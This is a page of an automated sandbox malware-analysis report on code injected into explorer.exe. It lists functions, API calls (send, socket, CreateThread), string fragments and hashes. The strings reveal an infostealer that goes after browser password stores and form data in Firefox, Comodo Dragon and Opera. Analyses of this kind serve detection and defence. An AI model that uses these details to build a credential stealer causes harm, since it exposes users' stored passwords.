Function 0F4E46B2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

send.WS2_32 ref: 0F4E4713

Strings

send, xrefs: 0F4E46DA

Memory Dump Source

Source File: 00000007.00000002.2885332691.000000000F4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F4A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f4a0000_explorer.jbxd

Similarity

API ID: send
String ID: send
API String ID: 2809346765-2809346765
Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
Instruction ID: 20fe3c02239e5d62a37b4e66df819ab2bf6420fcad47fe8068ff858dd129f7dd
Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
Instruction Fuzzy Hash: 57011270558A188FDB84EF5CD088B2577E0EB58315F1545AED85DCB266D670D8818B81

Uniqueness

Uniqueness Score: -1.00%

Function 0F4E45B2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

socket.WS2_32 ref: 0F4E4611

Strings

sock, xrefs: 0F4E45D9

Memory Dump Source

Source File: 00000007.00000002.2885332691.000000000F4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F4A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f4a0000_explorer.jbxd

Similarity

API ID: socket
String ID: sock
API String ID: 98920635-2415254727
Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
Instruction ID: 02278951d9c48c508ce40cc5687242bb824cb276098015af2fb5b4f38cac3258
Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
Instruction Fuzzy Hash: E5017830618A188FCB84EF1CE048B54BBE0FB59314F1545AEE81ECB366C7B4C9818B82

Uniqueness

Uniqueness Score: -1.00%

Function 0F4DC2DD Relevance: 1.6, APIs: 1, Instructions: 91
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SleepEx.KERNEL32 ref: 0F4DC32D

Memory Dump Source

Source File: 00000007.00000002.2885332691.000000000F4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F4A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f4a0000_explorer.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
Instruction ID: 12e4e2e004a2e10e08367052245d096dc106280d7fdc5215613d392d8db3fc4d
Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
Instruction Fuzzy Hash: 62316C70554B09DBDB64AF6980986EAF7A1FB55300F84426FDE2DCA207C734A090CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0F4DC412 Relevance: 1.5, APIs: 1, Instructions: 46
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNEL32 ref: 0F4DC461

Memory Dump Source

Source File: 00000007.00000002.2885332691.000000000F4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F4A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f4a0000_explorer.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
Instruction ID: 891e574e108dff663ecb6c9e0c4a951ae13cdbd4693335c5ef8f751627877707
Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
Instruction Fuzzy Hash: CFF0F630268B494FD788EF2CD48563AF3E0FBE9215F44463FA94DC3265DA39C5818756

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0FAB6D02 Relevance: 14.2, Strings: 11, Instructions: 404COMMON

Download Yara Rule

Strings

kern, xrefs: 0FAB6F5A
user, xrefs: 0FAB6F03
S, xrefs: 0FAB7073
net., xrefs: 0FAB6F44
el32, xrefs: 0FAB6F27
ll, xrefs: 0FAB6F13
32.d, xrefs: 0FAB6F0B
.dll, xrefs: 0FAB6F2F
M, xrefs: 0FAB7082
dll, xrefs: 0FAB6F4C
wini, xrefs: 0FAB6F72

Memory Dump Source

Source File: 00000007.00000002.2887169345.000000000F9D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F9D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f9d0000_explorer.jbxd

Similarity

API ID:
String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
API String ID: 0-393284711
Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
Instruction ID: 98ae227ae199bb00d6e540bdb0912d01d73a926891d04accd259eefb40da77ef
Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
Instruction Fuzzy Hash: F7E15974618F488FC764EF68C8947EAB7E4FB58300F404A2E959FC7256DF38A5418B89

Uniqueness

Uniqueness Score: -1.00%

Function 0F914D02 Relevance: 14.2, Strings: 11, Instructions: 404COMMON

Download Yara Rule

Strings

wini, xrefs: 0F914F72
32.d, xrefs: 0F914F0B
dll, xrefs: 0F914F4C
.dll, xrefs: 0F914F2F
el32, xrefs: 0F914F27
kern, xrefs: 0F914F5A
ll, xrefs: 0F914F13
net., xrefs: 0F914F44
M, xrefs: 0F915082
user, xrefs: 0F914F03
S, xrefs: 0F915073

Memory Dump Source

Source File: 00000007.00000002.2886880158.000000000F8A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f8a0000_explorer.jbxd

Similarity

API ID:
String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
API String ID: 0-393284711
Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
Instruction ID: 8ab3b4db619b6c4de9d9fed58b16786175f75c49e3f50eae1514834a10511be4
Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
Instruction Fuzzy Hash: F6E16A74618B4C8FC765EF68C4847AAB7E1FB98300F904A2E959BC7286DF34A501CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0FAB9792 Relevance: 21.6, Strings: 17, Instructions: 321COMMON

Download Yara Rule

Strings

encr, xrefs: 0FAB98D2
swor, xrefs: 0FAB98EA
itUR, xrefs: 0FAB985D
rnam, xrefs: 0FAB98B5
dUse, xrefs: 0FAB98AD
Subm, xrefs: 0FAB9855
encr, xrefs: 0FAB989D
user, xrefs: 0FAB9876
Fiel, xrefs: 0FAB9884
ypte, xrefs: 0FAB98DA
guid, xrefs: 0FAB97CE
d, xrefs: 0FAB98F2
form, xrefs: 0FAB984D
ypte, xrefs: 0FAB98A5
dPas, xrefs: 0FAB98E2
e, xrefs: 0FAB98BD
name, xrefs: 0FAB987D

Memory Dump Source

Source File: 00000007.00000002.2887169345.000000000F9D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F9D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f9d0000_explorer.jbxd

Similarity

API ID:
String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
API String ID: 0-2916316912
Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
Instruction ID: cf31d7cb4f33f3858021f553da9111a62bb7d7ddadffcb2182c0bd89d5765100
Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
Instruction Fuzzy Hash: 8CB17B30618B488EDB55EF68C485AEEB7F1FF98300F50451ED49AC7252EF78A505CB86

Uniqueness

Uniqueness Score: -1.00%

Function 0F917792 Relevance: 21.6, Strings: 17, Instructions: 321COMMON

Download Yara Rule

Strings

form, xrefs: 0F91784D
encr, xrefs: 0F9178D2
Fiel, xrefs: 0F917884
Subm, xrefs: 0F917855
encr, xrefs: 0F91789D
rnam, xrefs: 0F9178B5
dPas, xrefs: 0F9178E2
swor, xrefs: 0F9178EA
name, xrefs: 0F91787D
ypte, xrefs: 0F9178A5
user, xrefs: 0F917876
d, xrefs: 0F9178F2
guid, xrefs: 0F9177CE
e, xrefs: 0F9178BD
ypte, xrefs: 0F9178DA
itUR, xrefs: 0F91785D
dUse, xrefs: 0F9178AD

Memory Dump Source

Source File: 00000007.00000002.2886880158.000000000F8A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f8a0000_explorer.jbxd

Similarity

API ID:
String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
API String ID: 0-2916316912
Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
Instruction ID: 474009e9a6e46b0801d357d3ad67fd215556c67fec8603fb7e1f53c866e2afa0
Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
Instruction Fuzzy Hash: D5B17A30518B4C8FDB55EF688485AEEB7F1FF98300F50452ED49AC7292EF74A5098B86

Uniqueness

Uniqueness Score: -1.00%

Function 0FAB7622 Relevance: 21.4, Strings: 17, Instructions: 151COMMON

Download Yara Rule

Strings

w, xrefs: 0FAB76B3
s, xrefs: 0FAB7689
t, xrefs: 0FAB76C8
i, xrefs: 0FAB769E
l, xrefs: 0FAB76D6
2, xrefs: 0FAB7674
e, xrefs: 0FAB766D
p, xrefs: 0FAB7690
u, xrefs: 0FAB7661
d, xrefs: 0FAB76A5
l, xrefs: 0FAB7682
l, xrefs: 0FAB76AC
d, xrefs: 0FAB76CF
n, xrefs: 0FAB76BA
d, xrefs: 0FAB767B
n, xrefs: 0FAB76C1
c, xrefs: 0FAB7697

Memory Dump Source

Source File: 00000007.00000002.2887169345.000000000F9D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F9D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f9d0000_explorer.jbxd

Similarity

API ID:
String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
API String ID: 0-1539916866
Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
Instruction ID: d5249c29cf75c2870d792af445e1ed84c692f0bbec7c1a7554f1f055c4f535ad
Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
Instruction Fuzzy Hash: AF41A170A18B088FDB14DF88A4456BD7BF6FB88700F40025ED809D7246DBB9AD458BD6

Uniqueness

Uniqueness Score: -1.00%

Function 0F915622 Relevance: 21.4, Strings: 17, Instructions: 151COMMON

Download Yara Rule

Strings

d, xrefs: 0F9156A5
u, xrefs: 0F915661
d, xrefs: 0F9156CF
n, xrefs: 0F9156BA
l, xrefs: 0F9156D6
2, xrefs: 0F915674
c, xrefs: 0F915697
l, xrefs: 0F9156AC
l, xrefs: 0F915682
d, xrefs: 0F91567B
n, xrefs: 0F9156C1
e, xrefs: 0F91566D
s, xrefs: 0F915689
p, xrefs: 0F915690
w, xrefs: 0F9156B3
t, xrefs: 0F9156C8
i, xrefs: 0F91569E

Memory Dump Source

Source File: 00000007.00000002.2886880158.000000000F8A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f8a0000_explorer.jbxd

Similarity

API ID:
String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
API String ID: 0-1539916866
Opcode ID: b599dadc2d5d4ca7c80aba197006dfedd546e82360a12c84860ef0ea0feb8f42
Instruction ID: 1ea653cb70ab092d71dc23d9acded38181c7ca63c7197154d9cb0da606182037
Opcode Fuzzy Hash: b599dadc2d5d4ca7c80aba197006dfedd546e82360a12c84860ef0ea0feb8f42
Instruction Fuzzy Hash: B241D670A18B0CCFDB14DF88A4456BD7BE6FB88700F45026ED409D7242DBB49D458BD6

Uniqueness

Uniqueness Score: -1.00%

Function 0FABEAB2 Relevance: 17.8, Strings: 14, Instructions: 339COMMON

Download Yara Rule

Strings

c, xrefs: 0FABEC0B
[, xrefs: 0FABEBF6
], xrefs: 0FABECA8
], xrefs: 0FABEC3D
n, xrefs: 0FABEC98
l, xrefs: 0FABEC35
[, xrefs: 0FABEC66
[, xrefs: 0FABEC2D
e, xrefs: 0FABECA0
b, xrefs: 0FABEC73
l, xrefs: 0FABECE2
D, xrefs: 0FABECDA
[, xrefs: 0FABEC90
[, xrefs: 0FABECCD

Memory Dump Source

Source File: 00000007.00000002.2887169345.000000000F9D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F9D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f9d0000_explorer.jbxd

Similarity

API ID:
String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
API String ID: 0-355182820
Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
Instruction ID: 799a00efbc899afa604212cc677074824164f8bc9f84b29e1c4da047d10f8969
Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
Instruction Fuzzy Hash: 82C18B74218B099FC758EF64C485AEAF3E5FB98304F40472E959AC7202DF78A515CBC6

Uniqueness

Uniqueness Score: -1.00%

Function 0F91CAB2 Relevance: 17.8, Strings: 14, Instructions: 339COMMON

Download Yara Rule

Strings

n, xrefs: 0F91CC98
[, xrefs: 0F91CCCD
[, xrefs: 0F91CC2D
l, xrefs: 0F91CC35
[, xrefs: 0F91CC90
e, xrefs: 0F91CCA0
[, xrefs: 0F91CC66
], xrefs: 0F91CCA8
c, xrefs: 0F91CC0B
l, xrefs: 0F91CCE2
[, xrefs: 0F91CBF6
], xrefs: 0F91CC3D
D, xrefs: 0F91CCDA
b, xrefs: 0F91CC73

Memory Dump Source

Source File: 00000007.00000002.2886880158.000000000F8A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f8a0000_explorer.jbxd

Similarity

API ID:
String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
API String ID: 0-355182820
Opcode ID: 85872953d046aec5598fbdecbdfe5d2424bf83e4fa1743faadbf58ebecb380f9
Instruction ID: 06701caaf2c2924b74d50a5aeb5443a9d48c8df71a8d4656622cb10fbb09cc57
Opcode Fuzzy Hash: 85872953d046aec5598fbdecbdfe5d2424bf83e4fa1743faadbf58ebecb380f9
Instruction Fuzzy Hash: 50C16A74218B0D8FC759EF28C485AEAF3E5FB98304F40472E959AC7292DF34A515CB86

Uniqueness

Uniqueness Score: -1.00%

Function 0FABEF12 Relevance: 15.2, Strings: 12, Instructions: 201COMMON

Download Yara Rule

Strings

r, xrefs: 0FABEFA8
c, xrefs: 0FABEFC8
r, xrefs: 0FABEFA0
r, xrefs: 0FABEFB0
r, xrefs: 0FABEFC0
0, xrefs: 0FABEF5B
r, xrefs: 0FABEF98
r, xrefs: 0FABEFB8
., xrefs: 0FABEF63
n, xrefs: 0FABEF6B
r, xrefs: 0FABEF88
r, xrefs: 0FABEF90

Memory Dump Source

Source File: 00000007.00000002.2887169345.000000000F9D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F9D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f9d0000_explorer.jbxd

Similarity

API ID:
String ID: .$0$c$n$r$r$r$r$r$r$r$r
API String ID: 0-97273177
Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
Instruction ID: 2481889bfe716ca4789f7517604bb00816b582fdf9f983257b29c59fab1ed4c3
Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
Instruction Fuzzy Hash: 5D51E5301187488FD719DF58D8812EAB7E5FB85700F541A2EE9CBC7253DBB8A506CB82

Uniqueness

Uniqueness Score: -1.00%

Function 0F91CF12 Relevance: 15.2, Strings: 12, Instructions: 201COMMON

Download Yara Rule

Strings

0, xrefs: 0F91CF5B
c, xrefs: 0F91CFC8
r, xrefs: 0F91CFB8
., xrefs: 0F91CF63
r, xrefs: 0F91CFB0
r, xrefs: 0F91CFC0
r, xrefs: 0F91CF90
r, xrefs: 0F91CF98
r, xrefs: 0F91CFA8
r, xrefs: 0F91CF88
n, xrefs: 0F91CF6B
r, xrefs: 0F91CFA0

Memory Dump Source

Source File: 00000007.00000002.2886880158.000000000F8A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f8a0000_explorer.jbxd

Similarity

API ID:
String ID: .$0$c$n$r$r$r$r$r$r$r$r
API String ID: 0-97273177
Opcode ID: afc9bc78998aa09b23af23cafeda9009c5c37b602d2839cd6c0e72d87309ea2e
Instruction ID: fe2d26d8fafb5ceddc0f8397e04f328869b5b209f94ff0e256f5feb08e0286ba
Opcode Fuzzy Hash: afc9bc78998aa09b23af23cafeda9009c5c37b602d2839cd6c0e72d87309ea2e
Instruction Fuzzy Hash: FF51A33111874C8FD719DF18D8856AAB7E5FBC5704F501A3EE8CB87242DBB4A546CB82

Uniqueness

Uniqueness Score: -1.00%

Function 0FAB82F2 Relevance: 10.4, Strings: 8, Instructions: 380COMMON

Download Yara Rule

Strings

l, xrefs: 0FAB84E2
dragon_s.dll, xrefs: 0FAB8614
sspi, xrefs: 0FAB8320
opera_browser.dll, xrefs: 0FAB8629
nspr, xrefs: 0FAB84D4
dll, xrefs: 0FAB832E
4.dl, xrefs: 0FAB84DB
cli., xrefs: 0FAB8327

Memory Dump Source

Source File: 00000007.00000002.2887169345.000000000F9D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F9D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f9d0000_explorer.jbxd

Similarity

API ID:
String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
API String ID: 0-639201278
Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
Instruction ID: 7b99c63fdf2a8a3a657a8a8a7ad27be1b2411f3378481f21fe2daccf9807b74c
Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
Instruction Fuzzy Hash: 68C19270618B194FC758EF68D455AEAB3E9FB98300F94432D950EC7257DF38A90287C5

Uniqueness

Uniqueness Score: -1.00%

Function 0FAB82F4 Relevance: 10.4, Strings: 8, Instructions: 380COMMON

Download Yara Rule

Strings

l, xrefs: 0FAB84E2
dragon_s.dll, xrefs: 0FAB8614
sspi, xrefs: 0FAB8320
opera_browser.dll, xrefs: 0FAB8629
nspr, xrefs: 0FAB84D4
dll, xrefs: 0FAB832E
4.dl, xrefs: 0FAB84DB
cli., xrefs: 0FAB8327

Memory Dump Source

Source File: 00000007.00000002.2887169345.000000000F9D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F9D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f9d0000_explorer.jbxd

Similarity

API ID:
String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
API String ID: 0-639201278
Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
Instruction ID: a6510ad0e4fb9d8570edf4cfda795526128eb2dd54a8ec89b3553243176368e8
Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
Instruction Fuzzy Hash: 8AC19270618B194FC758EF68D455AEAB3E9FB98300F94432D950EC7257DF38AA0287C5

Uniqueness

Uniqueness Score: -1.00%

Function 0F9162F2 Relevance: 10.4, Strings: 8, Instructions: 380COMMON

Download Yara Rule

Strings

sspi, xrefs: 0F916320
l, xrefs: 0F9164E2
cli., xrefs: 0F916327
opera_browser.dll, xrefs: 0F916629
nspr, xrefs: 0F9164D4
dragon_s.dll, xrefs: 0F916614
4.dl, xrefs: 0F9164DB
dll, xrefs: 0F91632E

Memory Dump Source

Source File: 00000007.00000002.2886880158.000000000F8A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f8a0000_explorer.jbxd

Similarity

API ID:
String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
API String ID: 0-639201278
Opcode ID: 1544fa48809f3053681f9cfdf88afec2efe07a5eaf0c16fe2804e7fcde5ba9b4
Instruction ID: e9648d88e9c251abc50604e48ad2ba67e76c8f3b6f3f202ffc6d8f5cbb070112
Opcode Fuzzy Hash: 1544fa48809f3053681f9cfdf88afec2efe07a5eaf0c16fe2804e7fcde5ba9b4
Instruction Fuzzy Hash: D9C18F70A18B1D4FC758EF68D495AAAB3E5FBD8304F904379940EC7296DF34A902CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0F9162F4 Relevance: 10.4, Strings: 8, Instructions: 380COMMON

Download Yara Rule

Strings

sspi, xrefs: 0F916320
l, xrefs: 0F9164E2
cli., xrefs: 0F916327
opera_browser.dll, xrefs: 0F916629
nspr, xrefs: 0F9164D4
dragon_s.dll, xrefs: 0F916614
4.dl, xrefs: 0F9164DB
dll, xrefs: 0F91632E

Memory Dump Source

Source File: 00000007.00000002.2886880158.000000000F8A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f8a0000_explorer.jbxd

Similarity

API ID:
String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
API String ID: 0-639201278
Opcode ID: aa388ffa56de2b110a791f0225d976bfe5458330375412f824d137cd661a1bbe
Instruction ID: 1de58bbb867b9a1f9d44ef8521913f1067d6984ac51d42dd011693bee65453ef
Opcode Fuzzy Hash: aa388ffa56de2b110a791f0225d976bfe5458330375412f824d137cd661a1bbe
Instruction Fuzzy Hash: A9C18070A18B1D4FC758EF68D495AEAB3E5FBD8304F904379940AC7296DF34A902CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0FAB9CD4 Relevance: 9.0, Strings: 7, Instructions: 299COMMON

Download Yara Rule

Strings

Pass, xrefs: 0FAB9D97
UR, xrefs: 0FAB9D5F
word, xrefs: 0FAB9D9E
L: , xrefs: 0FAB9D66
name, xrefs: 0FAB9DB2
2, xrefs: 0FAB9DE1
User, xrefs: 0FAB9DAB

Memory Dump Source

Source File: 00000007.00000002.2887169345.000000000F9D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F9D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f9d0000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
Instruction ID: 8c9b35a80b9902d0ee898edaac5ee68eabc404d6c6622fd81fb40268d1f8cb0f
Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
Instruction Fuzzy Hash: E6A1AF706187488FDB29EFA8D444BEEB7E5FF88300F40462DE48AD7252EF7895458789

Uniqueness

Uniqueness Score: -1.00%

Function 0F917CD4 Relevance: 9.0, Strings: 7, Instructions: 299COMMON

Download Yara Rule

Strings

Pass, xrefs: 0F917D97
L: , xrefs: 0F917D66
2, xrefs: 0F917DE1
word, xrefs: 0F917D9E
UR, xrefs: 0F917D5F
name, xrefs: 0F917DB2
User, xrefs: 0F917DAB

Memory Dump Source

Source File: 00000007.00000002.2886880158.000000000F8A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f8a0000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: 6f986c04ea24220355da1831ec84f22de4136f4e9f6d50f176b47111870f90b3
Instruction ID: 45a715a58dde704f0b50b8bebbe86a09b7d8fc6135c083a52f61cd6398c865a4
Opcode Fuzzy Hash: 6f986c04ea24220355da1831ec84f22de4136f4e9f6d50f176b47111870f90b3
Instruction Fuzzy Hash: F8A1AF7061874C8BDB19EFA8D444BEEB7E1FF88304F40462DE48AD7292EF7495458B89

Uniqueness

Uniqueness Score: -1.00%

Function 0FAB9CE2 Relevance: 9.0, Strings: 7, Instructions: 288COMMON

Download Yara Rule

Strings

Pass, xrefs: 0FAB9D97
UR, xrefs: 0FAB9D5F
word, xrefs: 0FAB9D9E
L: , xrefs: 0FAB9D66
name, xrefs: 0FAB9DB2
2, xrefs: 0FAB9DE1
User, xrefs: 0FAB9DAB

Memory Dump Source

Source File: 00000007.00000002.2887169345.000000000F9D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F9D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f9d0000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
Instruction ID: 7d07fabb7dc3c00ce862c85a53ac17cb944fb9e6d52e4e617446163037db2ddd
Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
Instruction Fuzzy Hash: E0919F706187488FDB29EFA8D4447EEB7E5FB88300F40462ED48AD7252EF7895458789

Uniqueness

Uniqueness Score: -1.00%

Function 0F917CE2 Relevance: 9.0, Strings: 7, Instructions: 288COMMON

Download Yara Rule

Strings

Pass, xrefs: 0F917D97
L: , xrefs: 0F917D66
2, xrefs: 0F917DE1
word, xrefs: 0F917D9E
UR, xrefs: 0F917D5F
name, xrefs: 0F917DB2
User, xrefs: 0F917DAB

Memory Dump Source

Source File: 00000007.00000002.2886880158.000000000F8A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f8a0000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: bcb719629fd5a692338fc6b9696e9c2c497910c075fe9192b763179c0a1a695e
Instruction ID: e4bfa9174f3c26e97c8373983d37fa9fcadba08922409e2775ae38163151f5ef
Opcode Fuzzy Hash: bcb719629fd5a692338fc6b9696e9c2c497910c075fe9192b763179c0a1a695e
Instruction Fuzzy Hash: 2D918F7061874C8BDB19EFA8D444BEEB7E1FB88304F40462EE48AD7292EF7495458B85

Uniqueness

Uniqueness Score: -1.00%

Function 0FAB9352 Relevance: 6.5, Strings: 5, Instructions: 242COMMON

Download Yara Rule

Strings

n, xrefs: 0FAB93E7
., xrefs: 0FAB93B0
e, xrefs: 0FAB948E
, xrefs: 0FAB947C
v, xrefs: 0FAB94A0

Memory Dump Source

Source File: 00000007.00000002.2887169345.000000000F9D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F9D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f9d0000_explorer.jbxd

Similarity

API ID:
String ID: $.$e$n$v
API String ID: 0-1849617553
Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
Instruction ID: 6f2eed658c021202013f3bcaed0770ecc07b7f1625779f63f2634bae59a2fbc6
Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
Instruction Fuzzy Hash: 1E719271618B488FD758EFA8C4847EAB7F5FF58304F00062ED44AC7262EB79E9458B85

Uniqueness

Uniqueness Score: -1.00%

Function 0F917352 Relevance: 6.5, Strings: 5, Instructions: 242COMMON

Download Yara Rule

Strings

n, xrefs: 0F9173E7
v, xrefs: 0F9174A0
, xrefs: 0F91747C
e, xrefs: 0F91748E
., xrefs: 0F9173B0

Memory Dump Source

Source File: 00000007.00000002.2886880158.000000000F8A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f8a0000_explorer.jbxd

Similarity

API ID:
String ID: $.$e$n$v
API String ID: 0-1849617553
Opcode ID: 71beaa60f563440f8ac23b001faba31a4ff8abb3a89a3ee1cfce39f8ec44b54f
Instruction ID: e2d7906274336b56c0c3f2f7cf8af3a74af219088aec5aed83344cbcb032289f
Opcode Fuzzy Hash: 71beaa60f563440f8ac23b001faba31a4ff8abb3a89a3ee1cfce39f8ec44b54f
Instruction Fuzzy Hash: 5E71623161874D8FD758EFA8C4846AAB7F5FF98304F00063ED44AC72A2EB75E9458B85

Uniqueness

Uniqueness Score: -1.00%

Function 0FAB4C32 Relevance: 6.4, Strings: 5, Instructions: 175COMMON

Download Yara Rule

Strings

ole3, xrefs: 0FAB4C5D
